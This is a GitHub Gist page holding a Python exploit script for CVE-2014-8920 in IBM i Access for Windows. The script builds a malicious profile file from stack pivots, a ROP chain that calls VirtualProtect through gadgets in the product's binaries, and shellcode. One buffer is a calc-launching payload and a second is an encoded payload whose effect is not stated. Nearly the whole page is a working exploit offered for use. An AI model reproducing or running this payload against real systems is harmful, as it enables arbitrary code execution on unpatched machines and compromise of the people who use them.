Last active
August 19, 2016 14:12
-
-
Save emyei/87f93f4e4a61cf5a12c492235ca5032c to your computer and use it in GitHub Desktop.
IBM i Access for Windows - CVE-2014-8920 - Exploit
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import struct | |
# Reported by Fernando Muñoz | |
# Upstream: http://www-01.ibm.com/support/docview.wss?uid=nas8N1020518 | |
# Author: Marcelo Echeverria | |
# Tested on Windows XP SP3 | |
stack_pivot1 = 0x67bc6661 | |
stack_pivot2 = 0x67bc1967 | |
# Salta 3 veces: pivot1 + pivot2 + pivot1 | |
# Shellcode w32-calc google | |
buf = "\x31\xd2\x52\x68\x63\x61\x6c\x63\x89\xe6\x52\x56\x64\x8b\x72\x30\x8b\x76\x0c\x8b\x76\x0c\xad\x8b\x30\x8b\x7e\x18\x8b\x5f\x3c\x8b\x5c\x1f\x78\x8b\x74\x1f\x20\x01\xfe\x8b\x4c\x1f\x24\x01\xf9\x0f\xb7\x2c\x51\x42\xad\x81\x3c\x07\x57\x69\x6e\x45\x75\xf1\x8b\x74\x1f\x1c\x01\xfe\x03\x3c\xae\xff\xd7" | |
buf = "" | |
buf += "\x29\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81" | |
buf += "\x76\x0e\xa0\xa9\x85\xb6\x83\xee\xfc\xe2\xf4\x5c\x41" | |
buf += "\x07\xb6\xa0\xa9\xe5\x3f\x45\x98\x45\xd2\x2b\xf9\xb5" | |
buf += "\x3d\xf2\xa5\x0e\xe4\xb4\x22\xf7\x9e\xaf\x1e\xcf\x90" | |
buf += "\x91\x56\x29\x8a\xc1\xd5\x87\x9a\x80\x68\x4a\xbb\xa1" | |
buf += "\x6e\x67\x44\xf2\xfe\x0e\xe4\xb0\x22\xcf\x8a\x2b\xe5" | |
buf += "\x94\xce\x43\xe1\x84\x67\xf1\x22\xdc\x96\xa1\x7a\x0e" | |
buf += "\xff\xb8\x4a\xbf\xff\x2b\x9d\x0e\xb7\x76\x98\x7a\x1a" | |
buf += "\x61\x66\x88\xb7\x67\x91\x65\xc3\x56\xaa\xf8\x4e\x9b" | |
buf += "\xd4\xa1\xc3\x44\xf1\x0e\xee\x84\xa8\x56\xd0\x2b\xa5" | |
buf += "\xce\x3d\xf8\xb5\x84\x65\x2b\xad\x0e\xb7\x70\x20\xc1" | |
buf += "\x92\x84\xf2\xde\xd7\xf9\xf3\xd4\x49\x40\xf6\xda\xec" | |
buf += "\x2b\xbb\x6e\x3b\xfd\xc1\xb6\x84\xa0\xa9\xed\xc1\xd3" | |
buf += "\x9b\xda\xe2\xc8\xe5\xf2\x90\xa7\x56\x50\x0e\x30\xa8" | |
buf += "\x85\xb6\x89\x6d\xd1\xe6\xc8\x80\x05\xdd\xa0\x56\x50" | |
buf += "\xe6\xf0\xf9\xd5\xf6\xf0\xe9\xd5\xde\x4a\xa6\x5a\x56" | |
buf += "\x5f\x7c\x12\xdc\xa5\xc1\x45\x1e\xaa\x3d\xed\xb4\xa0" | |
buf += "\xb8\xd9\x3f\x46\xc3\x95\xe0\xf7\xc1\x1c\x13\xd4\xc8" | |
buf += "\x7a\x63\x25\x69\xf1\xba\x5f\xe7\x8d\xc3\x4c\xc1\x75" | |
buf += "\x03\x02\xff\x7a\x63\xc8\xca\xe8\xd2\xa0\x20\x66\xe1" | |
buf += "\xf7\xfe\xb4\x40\xca\xbb\xdc\xe0\x42\x54\xe3\x71\xe4" | |
buf += "\x8d\xb9\xb7\xa1\x24\xc1\x92\xb0\x6f\x85\xf2\xf4\xf9" | |
buf += "\xd3\xe0\xf6\xef\xd3\xf8\xf6\xff\xd6\xe0\xc8\xd0\x49" | |
buf += "\x89\x26\x56\x50\x3f\x40\xe7\xd3\xf0\x5f\x99\xed\xbe" | |
buf += "\x27\xb4\xe5\x49\x75\x12\x75\x03\x02\xff\xed\x10\x35" | |
buf += "\x14\x18\x49\x75\x95\x83\xca\xaa\x29\x7e\x56\xd5\xac" | |
buf += "\x3e\xf1\xb3\xdb\xea\xdc\xa0\xfa\x7a\x63" | |
def create_rop_chain(): | |
rop_gadgets = [ | |
0x0041c76d, # POP EAX # RETN [pcsws.exe] | |
0x004C11B4, # EAX (IAT OFFSET WaitForMultipleObjects) | |
0x67b95848, # MOV EAX,DWORD PTR DS:[EAX] # RETN [LTASWN20.DLL] | |
0x67b9b002, # POP ESI # RETN | |
0x0000013f, # IAT DEREFERENCING VirtualProtect | |
0x66fc4dfb, # ADD EAX,ESI # POP ESI # POP EBP # RETN | |
0x41414141, # ESI PAD | |
0x41414141, # EBP PAD | |
0x66eece8c, # XCHG EAX,ESI # RETN [PCSTLNET.dll] | |
0x004b5817, # POP EBP # RETN [pcsws.exe] | |
0x67392433, # & call esp [PCSHELP.dll] | |
0x67bd8003, # POP EBX # RETN [LTASWN20.DLL] | |
0x00000201, # 0x00000201-> ebx | |
0x00489a33, # POP EDX # DEC ESI # ADD AL,CH # RETN [pcsws.exe] | |
0x00000040, # 0x00000040-> edx | |
0x67963018, # POP ECX # RETN [PCSSH.dll] | |
0x66d2651d, # &Writable location [PCSWSAPI.dll] | |
0x66eecfb9, # POP EDI # RETN [PCSTLNET.dll] | |
0x66e79118, # RETN (ROP NOP) [PCSULIB.dll] | |
0x0041c76d, # POP EAX # RETN [pcsws.exe] | |
0x90909090, # nop | |
0x67bb99b2, # PUSHAD # RETN [LTASWN20.DLL] | |
] | |
return ''.join(struct.pack('<I', _) for _ in rop_gadgets) | |
rop_chain = create_rop_chain() | |
adjust_stack = "\x81\xc4\x00\x40\x00\x00\x89\xe5\x81\xc5\x00\x40\x00\x00\x66\x83\xe4\xf8\x66\x83\xe5\xf8" | |
print "[Profile]" | |
print "ID=WS" | |
print "Version=1" | |
print "["+struct.pack('<I',stack_pivot2)+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+struct.pack('<I',stack_pivot1)+"]" | |
print "a=1" | |
print "["+"M"*35+rop_chain+"\x90"*8+adjust_stack+"\x90"*2+buf+"\x90"*10 | |
print "a=1" | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment